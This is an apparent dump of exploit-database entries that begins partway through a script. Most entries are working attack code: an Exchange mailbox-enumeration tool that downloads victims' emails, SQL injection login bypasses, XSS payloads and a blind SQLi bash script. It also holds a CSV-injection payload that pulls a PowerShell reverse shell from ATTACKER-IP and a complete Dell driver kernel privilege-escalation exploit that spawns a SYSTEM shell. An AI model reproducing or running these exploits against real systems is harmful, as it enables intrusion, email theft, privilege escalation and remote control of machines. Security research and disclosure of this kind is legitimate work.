random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"]
rs = requests.post(url + uri, data=data, headers=headers, verify=False)
if "ErrorAccessDenied" in rs.text:
print("[*] Denied ;(.. retrying")
t_uri = uri.split("/")[-1]
for ru in random_uris:
print("[*] Retrying with {}".format(uri.replace(t_uri, ru)))
rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)
if "NoError" in rs.text:
print("[+] data found, dowloading email")
break
print("[+]Getting mails...")
dom_messages = ET.fromstring(rs.text)
messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')
for m in messages:
id_message = m[0].attrib.get("Id")
change_key_message = m[0].attrib.get("ChangeKey")
data = payload_get_mail.format(id_message, change_key_message)
random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"]
rs = requests.post(url + uri, data=data, headers=headers, verify=False)
if "ErrorAccessDenied" in rs.text:
print("[*] Denied ;(.. retrying")
t_uri = uri.split("/")[-1]
for ru in random_uris:
print("[*] Retrying with {}".format(uri.replace(t_uri, ru)))
rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)
if "NoError" in rs.text:
print("[+] data found, downloading email")
break
try:
f = open(path + "/" + user.replace("@", "_").replace(".", "_")+"_"+change_key_message.replace("/", "").replace("\\", "")+".xml", 'w+')
f.write(rs.text)
f.close()
except Exception as e:
print("[!] Can't write .xml file to path (email): ", e)
def checkURI(url, fqdn):
headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
"Content-Type": "text/xml",
"User-Agent": "Mozilla hehe"}
arr_uri = ["//ecp/xxx.js", "/ecp/favicon.ico", "/ecp/auth.js"]
for uri in arr_uri:
rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format("thisisnotanvalidmail@pwn.local"),
headers=headers)
#print(rs.content)
if rs.status_code == 200 and "MessageText" in rs.text:
print("[+] Valid URI:", uri)
calculated_domain = rs.headers["X-CalculatedBETarget"].split(".")
if calculated_domain[-2] in ("com", "gov", "gob", "edu", "org"):
calculated_domain = calculated_domain[-3] + "." + calculated_domain[-2] + "." + calculated_domain[-1]
else:
calculated_domain = calculated_domain[-2] + "." + calculated_domain[-1]
return uri, calculated_domain
#time.sleep(1)
print("[-] No valid URI found ;(")
exit(0)
def checkEmailBoxes(url, uri, user, fqdn, path):
headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
"Content-Type": "text/xml",
"User-Agent": "Mozilla hehe"}
rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),
headers=headers)
#time.sleep(1)
#print(rs.content)
if "ResponseCode" in rs.text and "ErrorAccessDenied" in rs.text:
print("[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable".format(user))
if "ResponseCode" in rs.text and "NoError" in rs.text:
print("[+] Valid Email Found!: {}".format(user))
extractEmail(url, uri, user, fqdn, rs.text, path)
if "ResponseCode" in rs.text and "ErrorNonExistentMailbox" in rs.text:
print("[-] Not Valid Email: {}".format(user))
def main():
__URL__ = None
__FQDN__ = None
__mailbox_domain__ = None
__path__ = None
print("[***** OhhWAA *****]")
parser = argparse.ArgumentParser(usage="Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>")
parser.add_argument('-u', "--url", help="Url, provide schema and not final / (eg https://example.org)", required=True)
parser.add_argument('-l', "--list", help="Users mailbox list", required=True)
parser.add_argument("-p", "--path", help="Path to write emails in xml format", required=True)
parser.add_argument('-f', "--fqdn", help="FQDN", required=False, default=None)
parser.add_argument("-d", "--domain", help="Domain to check mailboxes (eg if .local dont work)", required=False, default=None)
args = parser.parse_args()
__URL__ = args.url
__FQDN__ = args.fqdn
__mailbox_domain__ = args.domain
__list_users__ = args.list
__valid_users__ = []
__path__ = args.path
if not __FQDN__:
__FQDN__ = getFQDN(__URL__)
print("[+] Got FQDN:", __FQDN__)
valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)
if not __mailbox_domain__:
__mailbox_domain__ = calculated_domain
list_users = open(__list_users__, "r")
for user in list_users:
checkEmailBoxes(__URL__, valid_uri, user.strip()+"@"+__mailbox_domain__, __FQDN__, __path__)
print("[!!!] FINISHED OhhWAA")
if __name__ == '__main__':
main()
# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1
# Steps to Produce the Crash:
# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 300
print (buffer)
# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc)
# Exploit Author: H.H.A.Ravindu Priyankara
# Category: Denial of Service(DOS)
# Tested Version:1.47.1
# Vendor: Microsoft
# Software Download Link:https://code.visualstudio.com/updates/
Write-Host "
* *
*-------------------------------------------------------------------------------------------------------*
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host " Visual Studio Code (VS Code) Denial of Service " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Author :-" -ForegroundColor Green -NoNewline; Write-Host " H.H.A.Ravindu.Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Github :-" -ForegroundColor Green -NoNewline; Write-Host " https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host " |
*-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow
[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"
if ($Userinpts -eq "Run") {
Write-Output "Yeah I Know"
while ($True) {
$name = "AAAAAAA"
$name * 1000000
}
#or
#$name = "AAAAAAA"
#$name * 1000000
}
if ($Userinpts -eq "Stop") {
exit
}
#==========================================================
#==================== solution ============================
#==========================================================
#Update Your Visual Studio Code Application
# 1.47.1 version ==> 1.56.0 version
#==========================================================
# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
# Date: 04/08/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
# Version: <= 2021.8
# Tested on: Windows-Ubuntu
# CVE : CVE-2021-24245
Summary:
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
Proof of concepts:
1-Install "Stop Spammers <= 2021.8" in your wordpress website
2-For testing remove your IP address from the allowed list
3-Go to http://<YOUR-WEBSITE>/wp-admin
4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "
#Notice the `ad` keyword must be in your payload!
5-Press Alt + Shift + X to trigger Xss
#Tested on Firefox
Request POC:
POST /wp-login.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 161
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
# CVE: CVE-2021-27828
-----------------------------------------
SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.
--------------
# Error condition
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1
txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "
# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1
txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="
------------------------------
# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10
SQL Injection:
Injection flaws, such as SQL, NoSQL, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query. The
attacker’s hostile data can trick the interpreter into executing unintended
commands or accessing data without proper authorization.
Attack vector:
An attacker can gain admin panel access using malicious sql injection queries.
Steps to reproduce:
1) Open admin login page using following URl:
"http://localhost/covid-tms/login.php"
2) Now put the payload below the Username and password field.
Payload: admin' or '1'='1 and you will be successfully logged In as Admin without any credentials.
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - CSV Injection
# Date: 19/05/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: 6.1
# Description: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
import requests
import sys
import urllib3
"""
Proof of Concept:
Step-1
1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the below.
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0
Step-2
2- The request attempt will be saved to"User Attempts Audit Report" table that is under the Reports > Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12
j_username parameter value is saved to "User Name" column which is start of line in the CSV file. If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection
will be obtained by malicious user.
Details: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
"""
def loginReq(target,payload,getCsrf):
s = requests.Session()
data = {
"j_username": payload,
"j_password": "joker",
"domainName": "ADSelfService+Plus+Authentication",
"AUTHRULE_NAME": "ADAuthenticator",
"adscsrf": getCsrf
}
url = "https://"+target+"/j_security_check"
req = s.post(url, data=data, allow_redirects=False, verify=False)
if req.status_code == 302:
print("[+] Sending request is successful.")
print("[+] Injected payload: %s" %payload)
else:
print("[-] Something went wrong!")
print(req.status_code)
def getCsrfToken(target, payload=None):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
gUrl = "https://" + target + "/authorization.do"
getCsrf = requests.get(url=gUrl, allow_redirects=False, verify=False)
print("[*] Csrf token: %s" %getCsrf.cookies['_zcsr_tmp'])
loginReq(target,payload,getCsrf)
def main(args):
if len(args) != 3:
print("usage: %s targetIp:port payload" %(args[0]))
print("Example: python3 adSelfServiceCsv.py 192.168.1.253:9251 \"=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0\"")
sys.exit(1)
getCsrfToken(target=args[1], payload=args[2])
if __name__ == "__main__":
main(args=sys.argv)
# Exploit Title: Acer Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2021-05-19
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 3.0.0.99
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
NTI IScheduleSvc NTI ISch
eduleSvc C:\Program Files (x86)\NTI\Acer Backup Man
ager\IScheduleSvc.exe Auto
# Service info:
C:\>sc qc "NTI IScheduleSvc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NTI IScheduleSvc
TYPE : 110 WIN32_OWN_PROCESS <interactive>
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Acer Backup Manager\IScheduleSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NTI IScheduleSvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during application startup or reboot. If successful, the local user's
code would execute with the elevated privileges of the application.
# Exploit Title: ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path
# Date: 2020-05-19
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: www.asus.com
# Version: 1.0.94.0
# Tested on: Windows 10 Pro x64 es
# Description:
ATK Hotkey 1.0.94.0 suffers from an unquoted search path issue impacting the service 'AsHidService'. This could potentially allow an
authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
of the application.
# Prerequisites
Local, Non-privileged Local User with restart capabilities
# Details
C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ASUS HID Access Service AsHidService C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe Auto
C:\>sc qc "AsHidService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AsHidService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ASUS HID Access Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10
==> Stored Cross-Site Scripting XSS:
An attacker uses Stored XSS to inject malicious content (referred to as
the payload), most often JavaScript code, into the target application. If
there is no input validation, this malicious code is permanently stored
(persisted) by the target application, for example within a database. For
example, an attacker may enter a malicious script into a user input field
such as a blog comment field or in a forum post.
When a victim opens the affected web page in a browser, the XSS attack
payload is served to the victim’s browser as part of the HTML code (just
like a legitimate comment would). This means that victims will end up
executing the malicious script once the page is viewed in their browser.
==> Attack Vendor:
This vulnerability can results attacker injecting the XSS payload in the
Admin profile section and each time admin visits the all other sections of
the application the XSS triggers and the attacker can able to steal the
cookie according to the crafted payload.
==> Vulnerable Parameters:
"Admin name" parameter
==> Steps for reproduce:
1) Go to http://localhost/covid-tms/login.php
and logged In as an Admin (#Username: admin #Password: Test@123).
2) Click on (Admin --> Profile). Enter the payload in
Admin name = <script>alert(1337)</script>
Click on submit.
3) Now, whichever section of the application admin visits the payload gets executed successfully.
# Exploit Title: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2020-11-26
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 1.2.3500.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Live Updater Service Live Upd
ater Service C:\Program Files\Acer\Acer Updater\Updater
Service.exe Auto
# Service info:
C:\>sc qc "Live Updater Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Live updater Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Acer\Acer Updater\UpdaterService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Live Updater Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during application startup or reboot. If successful, the local user's
code would execute with the elevated privileges of the application.
# Exploit Title: Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)
# Exploit Author: @nu11secur1ty
# Date: 05.20.2021
# Software Link: https://github.com/spotweb/spotweb
# Proof: https://streamable.com/hix5o1
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
from selenium import webdriver
import time
import os, sys
# Vendor: https://www.nzbserver.com/
# Jump over login form :D
website_link="http://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true"
# enter your login username
username="nu11secur1ty"
# enter your login password
password="password"
#enter the element for username input field
element_for_username="loginform[username]"
#enter the element for password input field
element_for_password="loginform[password]"
#enter the element for submit button
element_for_submit="loginform[submitlogin]"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(3)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit Cross Site Scripting (DOM Based)
# Payload: #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
time.sleep(1)
# Payload link "esc-rule"
browser.get(("http://192.168.1.160/spotweb-develop#jaVasCript:/*-/*`/*\`/*'/*"'/**/(/**/oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'""))
print("The payload is deployed DOM is BOMing you ':))'...\n")
os.system('pause')
browser.close()
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("DOM...")
# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
# Date: 20/05/2021
# Exploit Author: Mansoor R (@time4ster)
# CVSS Score: 7.5 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
# Version Affected: 13.0 to 13.0.7
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# Patch: Upgrade to wp-statistics 13.0.8 (or above)
# Tested On: wp-statistics 13.0.6,13.0.7
#!/bin/bash
# Credits:
# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
# SQLmap Exploit for grepping database banner (automated):
# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
# WARNINGS:
# Only test the exploit on websites you are authorized to.
# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
# Exploit
# ==============
echo
echo "============================================================================================"
echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp-url <string> Wordpress target url
-k|--check Only checks whether vulnerable version of plugin is running or not.
-h|--help Print Help menu
Example:
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
"
}
#Processing arguments
check="false"
exploit="true"
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp-url)
wp_url="$2"
shift
shift # past argument
;;
-k|--check)
check="true"
exploit="false"
shift
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
function checkVersion()
{
url="$1"
[[ -z "$url" ]] && return
target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version"
[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
is_vulnerable="false"
for v in "${vuln_version[@]}";do
[[ "$version" == "$v" ]] && is_vulnerable="true" && break
done
[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable"
}
function exploitPlugin()
{
url="$1"
target_endpoint="$url/wp-admin/admin.php"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
sleep=3
payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
read choice
[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
echo
echo "[+] Trying Payload:"
set -x
curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
--data-urlencode "page=wps_pages_page" \
--data-urlencode "type=1" \
--data-urlencode "$payload"
}
[[ "$check" == "true" ]] && checkVersion "$wp_url"
[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
# Date: 10/05/2021
# Exploit Author: Paolo Stagno aka VoidSec
# Version: <= 2.3
# CVE: CVE-2021-21551
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/
#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <algorithm>
#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2
// define the buffer structure which will be sent to the vulnerable driver
typedef struct Exploit
{
uint64_t Field1; // "padding" can be anything
void* Field2; // where to write
uint64_t Field3; // must be 0
uint64_t Field4; // value to write
};
typedef struct outBuffer
{
uint64_t Field1;
uint64_t Field2;
uint64_t Field3;
uint64_t Field4;
};
// define a pointer to the native function 'NtQuerySystemInformation'
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// define the SYSTEM_HANDLE_INFORMATION structure
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
int main(int argc, char** argv)
{
// open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
HANDLE device = ::CreateFileW(
L"\\\\.\\DBUtil_2_3",
GENERIC_WRITE | GENERIC_READ,
NULL,
nullptr,
OPEN_EXISTING,
NULL,
NULL);
if (device == INVALID_HANDLE_VALUE)
{
std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";
// resolve the address of NtQuerySystemInformation and assign it to a function pointer
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Resolved NtQuerySystemInformation!\n";
// open the current process token - it will be used to retrieve its kernelspace address later
HANDLE currentProcess = ::GetCurrentProcess();
HANDLE currentToken = NULL;
bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, ¤tToken);
if (!success)
{
std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Opened a handle to the current process token!\n";
// allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
// call NtQuerySystemInformation and fill the handleTableInformation structure
ULONG returnLength = 0;
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
uint64_t tokenAddress = 0;
// iterate over the system's handle table and look for the handles beloging to our process
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
// if it finds our process and the handle matches the current token handle we already opened, print it
if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
{
tokenAddress = (uint64_t)handleInfo.Object;
std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
}
}
outBuffer buffer =
{
0,
0,
0,
0
};
/*
dt nt!_SEP_TOKEN_PRIVILEGES
+0x000 Present : Uint8B
+0x008 Enabled : Uint8B
+0x010 EnabledByDefault : Uint8B
We've added +1 to the offsets to ensure that the low bytes part are 0xff.
*/
// overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
Exploit exploit =
{
0x4141414142424242,
(void*)(tokenAddress + 0x40),
0x0000000000000000,
0xffffffffffffffff
};
// overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
Exploit exploit2 =
{
0x4141414142424242,
(void*)(tokenAddress + 0x48),
0x0000000000000000,
0xffffffffffffffff
};
// overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
Exploit exploit3 =
{
0x4141414142424242,
(void*)(tokenAddress + 0x50),
0x0000000000000000,
0xffffffffffffffff
};
DWORD bytesReturned = 0;
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit,
sizeof(exploit),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'Present' field!\n";
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit2,
sizeof(exploit2),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit3,
sizeof(exploit3),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
std::cout << "[+] Token privileges successfully overwritten!\n";
std::cout << "[+] Spawning a new shell with full privileges!\n";
system("cmd.exe");
return 0;
}